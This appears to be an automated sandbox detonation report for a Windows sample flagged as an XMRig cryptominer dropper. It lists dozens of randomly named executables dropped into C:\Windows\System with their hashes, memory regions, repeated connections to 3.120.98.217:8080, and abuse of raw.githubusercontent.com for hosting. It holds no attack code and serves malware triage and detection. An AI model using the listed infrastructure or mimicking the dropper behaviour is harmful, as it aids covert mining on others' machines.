C:\Windows\System\EkEaFeI.exe

C:\Windows\System\mLTtzdu.exe

C:\Windows\System\mLTtzdu.exe

C:\Windows\System\xoRqcKC.exe

C:\Windows\System\xoRqcKC.exe

C:\Windows\System\OAnbvTD.exe

C:\Windows\System\OAnbvTD.exe

C:\Windows\System\WuIgmlt.exe

C:\Windows\System\WuIgmlt.exe

C:\Windows\System\ltKookV.exe

C:\Windows\System\ltKookV.exe

C:\Windows\System\yNffoes.exe

C:\Windows\System\yNffoes.exe

C:\Windows\System\ABAKUoo.exe

C:\Windows\System\ABAKUoo.exe

C:\Windows\System\jGDlTTd.exe

C:\Windows\System\jGDlTTd.exe

C:\Windows\System\fKHtcgU.exe

C:\Windows\System\fKHtcgU.exe

C:\Windows\System\snSqcUz.exe

C:\Windows\System\snSqcUz.exe

C:\Windows\System\aDQOiCW.exe

C:\Windows\System\aDQOiCW.exe

C:\Windows\System\fEOLXxW.exe

C:\Windows\System\fEOLXxW.exe

C:\Windows\System\PvuqWAH.exe

C:\Windows\System\PvuqWAH.exe

C:\Windows\System\sAHHQci.exe

C:\Windows\System\sAHHQci.exe

C:\Windows\System\aGmNweI.exe

C:\Windows\System\aGmNweI.exe

C:\Windows\System\VGhpNHI.exe

C:\Windows\System\VGhpNHI.exe

C:\Windows\System\kGHDQOV.exe

C:\Windows\System\kGHDQOV.exe

C:\Windows\System\CEAkeiq.exe

C:\Windows\System\CEAkeiq.exe

C:\Windows\System\UWTCDXi.exe

C:\Windows\System\UWTCDXi.exe

C:\Windows\System\kpiJDFd.exe

C:\Windows\System\kpiJDFd.exe

C:\Windows\System\fQYipTC.exe

C:\Windows\System\fQYipTC.exe

C:\Windows\System\qfzTJzJ.exe

C:\Windows\System\qfzTJzJ.exe

C:\Windows\System\SfTSnhb.exe

C:\Windows\System\SfTSnhb.exe

C:\Windows\System\dkclMOq.exe

C:\Windows\System\dkclMOq.exe

C:\Windows\System\TEpWnoH.exe

C:\Windows\System\TEpWnoH.exe

C:\Windows\System\fUwHQpV.exe

C:\Windows\System\fUwHQpV.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2244-0-0x00000000000F0000-0x0000000000100000-memory.dmp

memory/2244-5-0x000000013F310000-0x000000013F706000-memory.dmp

C:\Windows\system\RFjOCyb.exe

MD5 1ead577d582e5dad0151eacfafcb73ba
SHA1 762fdcd589f8f1f0327b73a23c1bd9e9cc53fcf2
SHA256 f0b7f5bb97746716ca3df5117728841f250def8ad74a7088caf0c3ba66ac4f71
SHA512 ad755791e79493c1e1061a5ca33c630de9f6491a9d49018f6d669075bec5e6ff957ca8c703f31d4500bc02505f8347959324980a81e5a1b9032069a486112d87

memory/2592-8-0x000000013FC80000-0x0000000140076000-memory.dmp

\Windows\system\rlqTeyb.exe

MD5 aeb8a7aded583ef53e14b782499c26da
SHA1 d2d0c0b045ef40ce96e4b4a118fa828c8ec805b3
SHA256 ec2ef37faa679c56298836c51bdf75f4cbc15f9a70138a9c520b5a4b22cc2518
SHA512 cdbd7c83a58529fa165bcd1ac4d33b5509330b84fc5c20b34fc77bf3996289d9ff9a9a6cbb2943e5049a5f115c6b8250a567b6072fe8de9d92a7b599a09ebede

memory/2244-9-0x000000013FC80000-0x0000000140076000-memory.dmp

C:\Windows\system\XCjvrMk.exe

MD5 d6c169c7e2a4f2ad9909a3100e68bbe2
SHA1 4a8697b1529226896225bdba36df80db06ba7652
SHA256 f098700ff63ef9960a30cbc449167cf16d4b54a03c7123843479bd2dfd27fb0d
SHA512 321148fcb2de3d22b72adf8a7b789f9f4b53e51a361c3acfc082bf59fbf3a91327eb52374d8171882122bfd49c46ee207592620a631d787638d95aa1c67ccb50

C:\Windows\system\BzzzXmL.exe

MD5 283929d872e31db6d995d6658cb83d96
SHA1 b1ed3090463e04d7fbb5df64a53cb0d470f57384
SHA256 12c905f9f359e93e39b3be2fd7642f341d5bb6fb4aff9d477e8a5dffe103104b
SHA512 13c2410beb5ca4d02bddd1b26b8ad52049c5dfaaf07aae5f06474f9faf28109c4e65adff84c7fdd7c4d9ff7add6019d1608c8f1cc38a3f15508b030f77c4ffb7

C:\Windows\system\IuyWWCD.exe

MD5 977144e13cb34112adb9a07247f0f796
SHA1 b6c16a0b19df87875ec4a737c57cd6ce21832804
SHA256 477d63cbcae346c472b95acb89030b26e2b48a87a53f12c3718651effbbe9ccd
SHA512 b15b88dc15e379436abef029fe1c31d7510d4813b273007bff84422e1de6f19dac7c5aee95ceaee0ee5c186dfbc294276f27f3faccd672f1a489ecd4e06481b6

C:\Windows\system\NROggnf.exe

MD5 4aebafaf96282137b6ac622c7498d88a
SHA1 004a5d25c2b8fa846d50b803443bc446a0b77dbc
SHA256 b51ae066e87bc8a19f946317ec4e0f030e5ee2c7f7054182467e439f5ead08c6
SHA512 17cecc9052b694195262be91f762a9b200781fbb72b4c8ce0b6451e22eba8ef74ec11956daad72783c47315ecc42a10ef93a31ed4f8efd79921fdbfe4bf5610a

C:\Windows\system\BZxAsES.exe

MD5 08d6defea5be9aefdb9383cc5ae65bc4
SHA1 7388fbf754cf9d6243a5ab62ca76507334c77f15
SHA256 3148a18fe9eeefe154020229e7a63e4d31a4f67cb84d2f0cc6e2bb555e09a8b5
SHA512 6d5f58bdbf46f6cbcc96cc4a4e038abe587040d22bbd4c1f8da72a0fdd959d5ba32a2dc82440e6ad1cc003dc27ee69348ffaf20ec0917d1b8c60fc3c41be71f0

C:\Windows\system\JbXvWVu.exe

MD5 9df8d8fc89241f5ec995c7d7461a86a7
SHA1 ab01c312698e2b87c784a8373381fd131b27282a
SHA256 59360df62dd4ed095e18728bf492d99483b55ab9f90d2466b8b0259cb9298a41
SHA512 1272c78c621b687175a8b117225bb6a49cc77692ab0ed34118af1b11b59c5f0f114230620a20ea2d914559facaa91c8f4f4515577b367aaccd88bacfb9b6e802

memory/2684-127-0x000000013FC50000-0x0000000140046000-memory.dmp

C:\Windows\system\YpEGkDe.exe

MD5 dd3794b63dede8426f2e170c04de9db5
SHA1 9f668fbbdb0af948c66c2d6549ca4397ffdfe10d
SHA256 b803e2c09158d6c4eab4237f0f8a929f4f8bbccc72c5c03a2d9cedd1c213f3e0
SHA512 216dd2dfe516aeec10c01510328d564b7cf1b99460db87e171a38d7800724125a7502a08b88fac410cef07c5e703ae5e6a65898c5a758c8d748f1dcd70db3558

memory/2244-135-0x0000000003160000-0x0000000003556000-memory.dmp

memory/2244-141-0x000000013F720000-0x000000013FB16000-memory.dmp

memory/2244-107-0x000000013F950000-0x000000013FD46000-memory.dmp

\Windows\system\JalxMOi.exe

MD5 18bf7db82a60fb7f4e7a29384246e0ac
SHA1 a2197bc7bb24964ce2d95048dd8785f0be01c9e6
SHA256 4f8fcda4790ea32d96f8d95571d5797c9801bf4d32be564ab27ea352881d8a0f
SHA512 0bd99d1b2338a74ea34dbf28ff178b447c56210954015d7d82fd5167485b9bd52b787b2b2b2a50eda8fd828836cfbfea32aaea2c3c0d9b8742d5000291276f5a

memory/1796-447-0x000000001B5A0000-0x000000001B882000-memory.dmp

memory/1796-450-0x0000000002720000-0x0000000002728000-memory.dmp

memory/1796-520-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp

C:\Windows\system\fvSFAVv.exe

MD5 2082b5551e0b8230e5eade52dada0941
SHA1 7cd8a3adc4400d3418f388051753d472684121b4
SHA256 3690b6467b78d26fd2d6be3429663123c5c603fba9191144a2c336f341c639a5
SHA512 1ad38e96849023c2fdbc24bddeaba309954e9040445fb0b0d0e6d1b3eb97b3511e72ceb1dd8ba372758982d05c8194260e6f928aed17c9549f71818bf78f28f8

C:\Windows\system\rGfomqn.exe

MD5 4433e541a3e1f7afdcd47f2e5514df62
SHA1 356b7513b1413ccef95a921683f7c51661587676
SHA256 e1b8e93820fca4995c444c5741733753406ced05ba9be68918c550bfa9ab5d55
SHA512 f95555476d5085f9effff759777ab9056e8302b95a69a0c086390b11af1e71ee05452501c8b0cb6cf47f37577d5d3417f86f627b44c216105110e1dac37941c1

C:\Windows\system\BhbXRGX.exe

MD5 5e6ae29fa289076fd959382c4b02bbed
SHA1 7bf0c23f3db607701c3c642684e599381a9f5135
SHA256 b3f2a69da35af84c32d86c296914a36dc4a8929011a2596ae93ee78bd7ff7cb1
SHA512 f82e89ac3be83c3a5b25f2c357e584c8b9388919418c2b4bd9b7b674816502267dc830da7ac1278909abd49b112792bb605de94eaec4502c13010384bfa48975

C:\Windows\system\RkFbpYU.exe

MD5 c3ef302a6c6a8dc3b8995522052acd6e
SHA1 cf5b5e2754b5d4255fbb4219d968e7d7be90fa60
SHA256 c976bacaeaaf21faf63c24ff4e02bb00c00bc52356e308c198278c0376fecc31
SHA512 fe39838649a8c31cfe41d02427baec9a14d326311164a8439d9ae02ff7356a1fdb5f47a8353ac203b611aa82d19eb03eb2b8db2b6e638334831618f67c8d2621

C:\Windows\system\XJnhyfE.exe

MD5 bc1903664d3ce3c6b0ddb19d01190a0b
SHA1 f97b1fc1f965edab8cb0a2b0b42eaf0be887bc57
SHA256 aee7f1f9c62e9564ee72fbf0746bc15fc0d5c70778a40a1055913dbc9ba94222
SHA512 ce25725068542116cea844519caec55056e89d1ab7ece804199b0ed61490403e1601c57c6b45f015dba16b4475b1d61516ee8aed7ca17f94aa2bbbc9add26b00

C:\Windows\system\aNDliJj.exe

MD5 c29a7cb280cbcd8ef1e5393a1027cd91
SHA1 99e381b306da3be87a9aacf853c2fe037e0ed091
SHA256 dec4457753480c4844a9a67b879ae3365c230e608d7ca1d7b2862cc40f59b338
SHA512 8c1d9bbc073f1cc1ba6f47fe6e4d4a2b997da0a60d0beb4daa902385f8b01b87af704efa904bfd455f4aaabec216fa0ad20da2f2afc1caf49eeffe5d3a67eb88

C:\Windows\system\asziuZD.exe

MD5 f19ffcac225fd034c001ca5e457ed8ea
SHA1 f021d9e185ca32b304bf5425f14622eaf822ed47
SHA256 34fd2ce6240a098ada2499b9d7a02bf0a99ae38b42d614d06a32b4ca296dde53
SHA512 04f02b6c0d9073a899ca970a4f7732e1a716dfd51a4cfbf135d5dba7b04f35de47272f7532e948f93c29445a615aa84a767bef68cd41f85f195b08aa7cb60547

C:\Windows\system\JxOTmGq.exe

MD5 3f24bd438b4d87b14dcdfcaca56738b7
SHA1 9b9ff54942d3bed99dfff842ad426bd7b0e78a04
SHA256 feafe2a26adfde36b1718258cbadb164d230e88fb7c62dcf571da5fb270ae642
SHA512 1a32ba17739502901fc835b0341e44b13c88816425fb92cd056196efabea92c442d584643da8d520a60e897a04caa8a67993e860f5c39215510c86836656281b

C:\Windows\system\kzXuSYy.exe

MD5 660edba53513437e9d95fc3cac292385
SHA1 3f3887ecef545e85d522d43cefe5ebdec61bba40
SHA256 79603f90c190e6ea2ef57b576e81aabd07a68aa733d94b7a969bf391d103a3ed
SHA512 770bedcd0e06ef5a29305f0cedae61cbf1b5ee91671daf3d8d30b8456ab3dbe1830b94eb3e3746a5dce275a37ce6667518fa8a2e4a6b3f5747197e244ed444da

C:\Windows\system\qcgcnae.exe

MD5 93faa4cb69d3eb820c562cc28355ad9d
SHA1 7a3deecd9a50716b02cb147e0136ce02f4f7e2ae
SHA256 fecec62fe038088a08b38297d964de489f6dee16477de652c78b6f3595546671
SHA512 3788389cf2df2d23cd7fa7bb42bdf2c8ea6183fe8ccc93dec995275f839c478d818da01cf929c84929f643fe79efe94430dc176af5d45579a9810bd6c2653ddf

memory/2900-115-0x000000013F950000-0x000000013FD46000-memory.dmp

\Windows\system\pSjaQFX.exe

MD5 3dc5a785c76a06c37a49552e33a279bc
SHA1 1312e136bd053b77414f8369ab93239b4e531abd
SHA256 cc97ae4f68bd117d292d8e6b01ada7201aba96335a9a800714f7f364f6744a58
SHA512 5d14b20e7e0b44f0eeb87a69f6c02200fe10f20f54e723d99db4d774dac3cb8df32cb5b6d7723145be7e100965b489ef5c5180556a40cc6d5283c351c4ad585e

memory/2640-144-0x000000013F590000-0x000000013F986000-memory.dmp

memory/2628-106-0x000000013F890000-0x000000013FC86000-memory.dmp

memory/2244-105-0x000000013F890000-0x000000013FC86000-memory.dmp

memory/2804-104-0x000000013FF20000-0x0000000140316000-memory.dmp

memory/2244-103-0x000000013FF20000-0x0000000140316000-memory.dmp

memory/1796-102-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp

memory/2244-143-0x0000000003160000-0x0000000003556000-memory.dmp

memory/1328-142-0x000000013F720000-0x000000013FB16000-memory.dmp

memory/2292-140-0x000000013FAA0000-0x000000013FE96000-memory.dmp

memory/2244-138-0x000000013FAA0000-0x000000013FE96000-memory.dmp

memory/2160-137-0x000000013F0F0000-0x000000013F4E6000-memory.dmp

memory/2544-134-0x000000013F880000-0x000000013FC76000-memory.dmp

memory/2244-132-0x000000013F880000-0x000000013FC76000-memory.dmp

memory/2568-131-0x000000013FCC0000-0x00000001400B6000-memory.dmp

C:\Windows\system\sTwGySl.exe

MD5 9385ac0b2a0f610e75e557ef457e1551
SHA1 ebdab4619b2e1306eb667a2a47e594411a7eb392
SHA256 b9f2fde730c4199baa97049273f70914914e5367f6faa7833c3d16cf6dfe989f
SHA512 8bcb50e0e4a0e2745375e6052a29ed92595e0d1a0e77028e891a8abf0ae5e7201008c7a77474727d3b40c8cd4cdecebfba8ca39954cf5e59c94befb9424c09d5

memory/2244-128-0x000000013FCC0000-0x00000001400B6000-memory.dmp

memory/2244-119-0x000000013FC50000-0x0000000140046000-memory.dmp

C:\Windows\system\Szjcmbf.exe

MD5 3511714fb9c6261e0ceb7827f77f9ecf
SHA1 7b3a033f4ee7edade10eb154e2eb6bf00a41239f
SHA256 555d6c3108aa37d3f5e2d9dd79d54b89d6d78d18f157a46ed40ebe38512fe3a7
SHA512 dca02c4941b26905a5963080cfd6417f43eeda9a2c0772a19e7a64f4ba2bfb20ccf7c5299ae5cff165042257ba8317d7873b074aa3feb606577653e5e70267c4

C:\Windows\system\riyahnI.exe

MD5 5c02e4253b69a12bc73fc62a2a1a80c1
SHA1 b9119472f68ef7b1c59a5cadbb7b5bdd91c39b11
SHA256 9c4ec997c0e485536e2bdbee4a04b5326cae7b86a25c8d24762f3eb50d4e6b7b
SHA512 b227a76581cebc5c429dbb6c90daf08cd729e51a9a3ee62e20f2392c8be93c368a22622d249433071c68b2203809bc02bc48801e7d4bfed98eee41afe77c812b

C:\Windows\system\WtoRDXP.exe

MD5 02c80af0a9736124ca6f47357c831fbb
SHA1 575e8705520b8c10681089e4c707ed414129f2fe
SHA256 1f29e8597a9a83e3720651a83a9766e11521c8c4dc47d36c6e3eb0da1d9b55f6
SHA512 58a1d52f94a6df8efe5e648ebc9f396f7d4c9ff01b5e68d153e4374f02d78ede0fe9466c18bc1f984f7986a97b83faf088eed3d5d2c55744fbe79fa2f85e3b24

C:\Windows\system\AxENnFt.exe

MD5 eee46fd982a6c32ca379dcde59bd24b9
SHA1 ae9bd379ed163927a2e66f9cc07f5f9777ecfc7a
SHA256 ceca7c6787cedbcc48cec2edc4440a3d688f61758650116565c261f361fb430b
SHA512 37722673cceb70d2d5540ef70cb0f9fb51c40e58cb0eb39fd26ce5a9e7fc49ed894af0ce343c0a15228673b3a125b3280cc8c29a24d928ec630015f3877fe65c

C:\Windows\system\HADKonB.exe

MD5 3cfb86351f874d0b1015656f915b941f
SHA1 9dc8f8bc6448dccfd7fe2aadde365c93b3792562
SHA256 25df83e325f7851f9a6ddfe495d1f0d6e065af7ef0c2bd81acc4e9e7889f5d40
SHA512 e52bdc84a9365100281baaecca9ce9c7477cfd747cbf3ebcd1bb40a24fc01c41a86de93528b141774bb998222006d696d365c484a7ed25d398691f5d5dc116d8

C:\Windows\system\ocWCgUC.exe

MD5 0c94aa8c0cfc4f1c6915ba0483554806
SHA1 3b8de0dd76cd3c85148ac1821191ab3bceb2f9bd
SHA256 b025eb900129d818d81be9d55956755804543b2eacab36c5cb0b9189ee850856
SHA512 9eaf6b1cf31f45eb2d1f671dee47789ac02d851e2a0dfe6f7e3f504a4d56ad41439d4b942e97421955cf6a7fa63d494e9b631de98fb11a018c8643558c6caf41

C:\Windows\system\OyhyBtt.exe

MD5 5c687977d2f9460a8cf1a75a5ae41cf4
SHA1 0f58575814b6c218f8aecd73d2fa336561ee43f6
SHA256 8082bcf5b2b8ff54f60b14f47bf71b1c4571ebb484e48deaca13c74a53fbe39b
SHA512 317788f424a202b6bc7d5bcee236ebc748229916a369ebb4f39bb68f4ade811bf2d60a6d8ed7d323edd558822c62b70654af8d06bb5a5ce4063ed3daaf32609f

C:\Windows\system\GUdFGvu.exe

MD5 f9f5cfe37a05567476b4e6c88c0b41c1
SHA1 f9052ddcb678b2d8cb8a69a4fd00978e1631862f
SHA256 1e3a6b4188a071de988af827384affcbad5d350025fabca26ff50863906be207
SHA512 11db86dab36266c270c74cd435423916eb0ea363490151aaebbc5f78552de35f6368792bb8f79af4dcc2fb174e58ead1419f65f77655fcb2d0e14dc7c8bde3c6

C:\Windows\system\EAOnrIk.exe

MD5 f95061f598a185dfada7b3311d2c11e9
SHA1 81967d5bb12af271b7052dda4bc25fb85e8ca66a
SHA256 be98763e7d9bb4f5b92a9212bc00f4da062246838072a93d7a533a691593c09d
SHA512 238aabebdad92e3086a631080b4bf1465d5c3a4c5e0fbbc5ac3a5e44465f52ddadd91dff1156bcc92d6983f3441c014403f45b878b75de7bbadfe2f69bacce33

C:\Windows\system\SxzuejO.exe

MD5 da28d146d347acb50e85fb4c6e2d6388
SHA1 1657db1213bb44bf3e77d8159fcf48f8596f1203
SHA256 d62b0631cdb918e5ed74c25f1cfe2c7e430708d7a8337ed4445e25f0b551ab72
SHA512 12077ab1923c13a818be95b54d9da948f7508f9481a68a5c62436a082fe1824a0af53a81e8994cb850ac5b9230a054723ee32a9b8f3aa7da14979226a4bf30c2

memory/1796-24-0x000007FEF586E000-0x000007FEF586F000-memory.dmp

memory/1796-23-0x0000000002AD0000-0x0000000002B50000-memory.dmp

memory/2744-22-0x000000013F120000-0x000000013F516000-memory.dmp

memory/2244-2661-0x000000013F310000-0x000000013F706000-memory.dmp

memory/2244-3143-0x000000013FC80000-0x0000000140076000-memory.dmp

memory/2244-3145-0x0000000003160000-0x0000000003556000-memory.dmp

memory/2244-3434-0x0000000003160000-0x0000000003556000-memory.dmp

C:\Windows\system\gNVRHVG.exe

MD5 44bf49d36035eb00f5300ac1a1afc446
SHA1 efe4f6ff307f9caed7f6949e1a19ce6bff5ede19
SHA256 d6adb65d904d88ebbf5f73cace13dbd8ceb7d6b2b977c021ad3b0a4aa99b648f
SHA512 8e76802b3f04a2be9fcb0a504a2aab7f3a79e962c545a85c01bc2528c719fc825f28229de452d4507e45ed92f726c1862885d6f18fa5e01cbf2b77dcdf5d1348

memory/2804-9023-0x000000013FF20000-0x0000000140316000-memory.dmp

memory/2900-9036-0x000000013F950000-0x000000013FD46000-memory.dmp

memory/2544-9040-0x000000013F880000-0x000000013FC76000-memory.dmp

memory/1328-9059-0x000000013F720000-0x000000013FB16000-memory.dmp

memory/2160-9057-0x000000013F0F0000-0x000000013F4E6000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 23:41

Reported

2024-06-13 23:43

Platform

win10v2004-20240508-en

Max time kernel

62s

Max time network

50s

Command Line

"C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\tCGPAkK.exe N/A
N/A N/A C:\Windows\System\FaLvxhX.exe N/A
N/A N/A C:\Windows\System\phzlgIG.exe N/A
N/A N/A C:\Windows\System\nbOglKf.exe N/A
N/A N/A C:\Windows\System\LvMWiuh.exe N/A
N/A N/A C:\Windows\System\IGtJjFi.exe N/A
N/A N/A C:\Windows\System\mEuCjTa.exe N/A
N/A N/A C:\Windows\System\YDOJphm.exe N/A
N/A N/A C:\Windows\System\UYFLoDU.exe N/A
N/A N/A C:\Windows\System\wdBZlNO.exe N/A
N/A N/A C:\Windows\System\EQRVuWV.exe N/A
N/A N/A C:\Windows\System\TFeNSAS.exe N/A
N/A N/A C:\Windows\System\wuKooHC.exe N/A
N/A N/A C:\Windows\System\OxDVdLa.exe N/A
N/A N/A C:\Windows\System\gsQEoSu.exe N/A
N/A N/A C:\Windows\System\QHTRiAn.exe N/A
N/A N/A C:\Windows\System\vcJWFZh.exe N/A
N/A N/A C:\Windows\System\oqeHybi.exe N/A
N/A N/A C:\Windows\System\OnEwCHM.exe N/A
N/A N/A C:\Windows\System\ioWLjoA.exe N/A
N/A N/A C:\Windows\System\ebBqHwr.exe N/A
N/A N/A C:\Windows\System\Kqafkpe.exe N/A
N/A N/A C:\Windows\System\NFtAnYc.exe N/A
N/A N/A C:\Windows\System\NWOpcOz.exe N/A
N/A N/A C:\Windows\System\EPLJOjC.exe N/A
N/A N/A C:\Windows\System\boYNubX.exe N/A
N/A N/A C:\Windows\System\DJpoIPh.exe N/A
N/A N/A C:\Windows\System\vJepWnN.exe N/A
N/A N/A C:\Windows\System\KypvGBf.exe N/A
N/A N/A C:\Windows\System\GpUqJDb.exe N/A
N/A N/A C:\Windows\System\buziPVp.exe N/A
N/A N/A C:\Windows\System\fgFosbz.exe N/A
N/A N/A C:\Windows\System\LiBAgXw.exe N/A
N/A N/A C:\Windows\System\cbZcios.exe N/A
N/A N/A C:\Windows\System\OWcqhIj.exe N/A
N/A N/A C:\Windows\System\atvNpZp.exe N/A
N/A N/A C:\Windows\System\pbjFhFo.exe N/A
N/A N/A C:\Windows\System\hWUcEEb.exe N/A
N/A N/A C:\Windows\System\byBuVBz.exe N/A
N/A N/A C:\Windows\System\hyIYWaZ.exe N/A
N/A N/A C:\Windows\System\vMqkeoR.exe N/A
N/A N/A C:\Windows\System\dAeQqte.exe N/A
N/A N/A C:\Windows\System\CnjarIV.exe N/A
N/A N/A C:\Windows\System\aulPfNz.exe N/A
N/A N/A C:\Windows\System\OwfkyUr.exe N/A
N/A N/A C:\Windows\System\BCutflR.exe N/A
N/A N/A C:\Windows\System\pnSdWLU.exe N/A
N/A N/A C:\Windows\System\vZSRHTT.exe N/A
N/A N/A C:\Windows\System\qsccTNJ.exe N/A
N/A N/A C:\Windows\System\poWkzel.exe N/A
N/A N/A C:\Windows\System\eSdqUtL.exe N/A
N/A N/A C:\Windows\System\HIAbeRZ.exe N/A
N/A N/A C:\Windows\System\KoGbKpT.exe N/A
N/A N/A C:\Windows\System\RqUNTsp.exe N/A
N/A N/A C:\Windows\System\giwkzJQ.exe N/A
N/A N/A C:\Windows\System\tCGIVLx.exe N/A
N/A N/A C:\Windows\System\zIKzUps.exe N/A
N/A N/A C:\Windows\System\pUSNiRH.exe N/A
N/A N/A C:\Windows\System\RtDZLmy.exe N/A
N/A N/A C:\Windows\System\aLHhYRI.exe N/A
N/A N/A C:\Windows\System\eMRIDXG.exe N/A
N/A N/A C:\Windows\System\mATfyMu.exe N/A
N/A N/A C:\Windows\System\GKJVoXS.exe N/A
N/A N/A C:\Windows\System\VwCqhQc.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\QbLtciT.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\PcFJIVU.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\CiciETw.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\jPuywQJ.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\Wwnigwf.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\poWkzel.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\hVYuOTh.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\GhRuvXj.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\BfFbOpH.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\HNOQJjI.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\giCLxOB.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\BvMjGIB.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\PVkoNas.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\rwiVsWB.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\IGtJjFi.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\kfjCXZz.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\lCWPABK.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
